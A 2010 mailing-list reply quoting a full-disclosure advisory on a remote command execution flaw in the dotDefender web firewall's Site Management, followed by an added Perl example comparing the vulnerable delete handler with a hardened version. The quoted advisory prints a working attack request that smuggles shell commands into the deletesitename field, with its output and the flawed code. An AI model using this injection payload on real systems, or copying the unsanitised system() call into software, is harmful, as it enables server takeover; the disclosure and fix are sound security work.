Message-ID: <20100630235601.432203d0@foo.fgeek.fi>
Date: Wed, 30 Jun 2010 23:56:01 +0300
From: Henri Salo <henri@...v.fi>
To: John Dos <dotdefeater@...glemail.com>
Cc: bugtraq <bugtraq@...urityfocus.com>
Subject: Re: [Full-disclosure] Remote Command Execution in dotDefender Site Management
On Mon, 30 Nov 2009 16:48:49 +0100
John Dos <dotdefeater@...glemail.com> wrote:
> Problem Description
> ===================
>
> A remote command execution vulnerability exists in the dotDefender
> (3.8-5) Site Management.
>
>
> dotDefender [1] is a web application firewall (WAF) which 'prevents
> hackers from attacking your website.'
>
>
> Technical Details
> =================
>
> The Site Management application of dotDefender is reachable as a web
> application (https:site/dotDefender/)
> on the webserver. After passing the Basic Auth login you can
> create/delete applications.
> The mentioned vulnerability is in the 'deletesite' implementation and
> the 'deletesitename' variable.
> Insufficient input validation allows an attacker to inject arbitrary
> commands.
>
>
> Delete Site
> ===========
>
> A normal delete transaction looks as follows:
>
> POST /dotDefender/index.cgi HTTP/1.1
> Host: 172.16.159.132
> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip,deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Connection: keep-alive
> Referer: https://172.16.159.132/dotDefender/index.cgi
> Authorization: Basic YWRtaW46
> Cache-Control: max-age=0
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 76
>
> sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14
>
> An attack looks like:
>
> --------------------/Request/--------------------
> POST /dotDefender/index.cgi HTTP/1.1
> Host: 172.16.159.132
> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip,deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Connection: keep-alive
> Referer: https://172.16.159.132/dotDefender/index.cgi
> Authorization: Basic YWRtaW46
> Cache-Control: max-age=0
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 95
>
> sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
>
> --------------------/Response/--------------------
> [...]
> <br>
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> [...]
>
>
>
> Affected Code
> =============
>
> The affected code (perl) is in index1.cgi of the admin interface:
>
> 311
> 312 }elsif($action eq "deletesite") { # delete site
> 313     $deletesitename=$postFields{"deletesitename"};
> 314     $dots_index = index($deletesitename,"%3A");
> 315
> 316     if($dots_index != -1 ) {
> 317         $site_a_part= substr($deletesitename,0,$dots_index);
> 318         $site_b_part= substr($deletesitename,$dots_index+3,length($deletesitename)-$dots_index-2);
> 319         $site_a_part=&cleanIt($site_a_part);
> 320         $site_b_part=&cleanIt($site_b_part);
> 321         $deletesitename = $site_a_part.":".$site_b_part;
> 322     }
> 323
> 324     $linenum=$postFields{'linenum'};
> 325     applyDbAudit($action);
> 326     &delline($linenum,2);
> 327     cleanSiteFingerPrints($deletesitename);
> 328
> 329     &deleteSiteConf($deletesitename);
> 330     $site_params="$CTMP_DIR/".$deletesitename."_params";
> 331     system("rm -f $site_params");
>
>
> And applicure-lib2.pl:
>
> 13 sub cleanIt {
> 14     my($param,$type)=@_;
> 15
> 16     $param =~ s/%([a-fA-F0-9]{2})/pack "H2", $1/eg;
> 17     if ($type eq 'any') {
> 18     } elsif ($type eq 'filter') {
> 19         $param =~ s/\+/" "/eg;
> 20     } elsif ($type eq 'path') {
> 21         $param = un_urlize($param);
> 22         #$param =~ s/([^A-Za-z0-9\-_.\/~'])//g;
> 23         #$param =~ s/\+/" "/eg;
> 24     } else {
> 25         $param =~ s/([^A-Za-z0-9\-_.~'])//g;
> 26     }
> 27     return $param;
> 28 }
>
>
> Here one can see that certain shell control characters are not
> protected by the call to cleanIt. Thus an attacker
> can gain control of the system call in line 331 of index1.cgi.
>
>
> References
> ===========
>
> [1] http://applicure.com/
Have they fixed this issue? Does this have CVE-identifier assigned?
---
Henri Salo
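Added example, not part of either message above and not dotDefender's own code: the quoted deletesite handler pattern rebuilt in Perl beside a hardened version, so the two can be run side by side against the payload from the quoted request. The vulnerable function returns the command string instead of calling system(), which makes the injected ';id;ls ...' visible without executing it. The function names, the temporary directory standing in for $CTMP_DIR, the host[:port] allow-list regex and the sample site names are assumptions; the payload string is the one from the advisory.

```perl
#!/usr/bin/perl
# Added example, not dotDefender's code: the deletesite pattern from the
# quoted index1.cgi beside a hardened version. Function names, the temp
# directory and the sample site names are assumptions; the payload string
# is the one from the quoted attack request.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Mirrors the quoted cleanIt() default branch: URL-decode %XX, then strip
# everything outside [A-Za-z0-9-_.~'].
sub clean_it {
    my ($param) = @_;
    $param =~ s/%([a-fA-F0-9]{2})/pack "H2", $1/eg;
    $param =~ s/[^A-Za-z0-9\-_.~']//g;
    return $param;
}

# Vulnerable shape (index1.cgi lines 313-331): cleanIt() only runs when the
# name contains "%3A", and the result is interpolated into a shell command.
# Returns the command string instead of calling system(), so the injected
# ';id;ls ...' is visible without executing anything.
sub build_delete_cmd_vuln {
    my ($deletesitename, $ctmp_dir) = @_;
    my $dots_index = index($deletesitename, "%3A");
    if ($dots_index != -1) {
        my $a_part = substr($deletesitename, 0, $dots_index);
        my $b_part = substr($deletesitename, $dots_index + 3);
        $deletesitename = clean_it($a_part) . ":" . clean_it($b_part);
    }
    my $site_params = "$ctmp_dir/" . $deletesitename . "_params";
    return "rm -f $site_params";    # /bin/sh would split on every ';'
}

# Hardened version: decode the one encoded character the handler expects,
# allow-list the whole name unconditionally, and never go through a shell.
# Returns the path it removed (or found absent); dies on bad input.
sub delete_site_params_safe {
    my ($deletesitename, $ctmp_dir) = @_;
    $deletesitename =~ s/%3A/:/gi;
    # host[:port] only: no '/', no whitespace, no shell metacharacters.
    $deletesitename =~ /\A([A-Za-z0-9][A-Za-z0-9.\-]{0,253}(?::[0-9]{1,5})?)\z/
        or die "deletesite: rejected site name\n";
    my $safe_name   = $1;
    my $site_params = File::Spec->catfile($ctmp_dir, "${safe_name}_params");
    if (-e $site_params) {
        # unlink() is a syscall; if an external tool were really needed,
        # list-form system('rm', '-f', $site_params) also bypasses the shell.
        unlink $site_params or die "deletesite: unlink $site_params: $!\n";
    }
    return $site_params;
}

my $payload  = 'dotdefeater;id;ls -al ../;pwd;';   # from the quoted request
my $ctmp_dir = tempdir(CLEANUP => 1);             # stands in for $CTMP_DIR

print "vulnerable command: ", build_delete_cmd_vuln($payload, $ctmp_dir), "\n";

# The hardened handler refuses the payload ...
eval { delete_site_params_safe($payload, $ctmp_dir) };
print "hardened, payload: ", ($@ ? $@ : "deleted\n");

# ... and still removes a legitimate site's params file.
open my $fh, '>', "$ctmp_dir/dotdefeater_params" or die "open: $!\n";
close $fh;
my $removed = delete_site_params_safe('dotdefeater', $ctmp_dir);
print "hardened, legit: removed $removed, still exists: ",
      (-e $removed ? "yes" : "no"), "\n";
```

Running it prints the vulnerable command with the semicolons intact, which is the string /bin/sh would have split into rm, id, ls and pwd in the quoted response; the hardened call dies on that payload and removes only the legitimate dotdefeater_params file. Note that the quoted code also passes $deletesitename to cleanSiteFingerPrints() and deleteSiteConf() before the system() on line 331, so any fix has to validate the name once at the top of the handler rather than only in front of the rm.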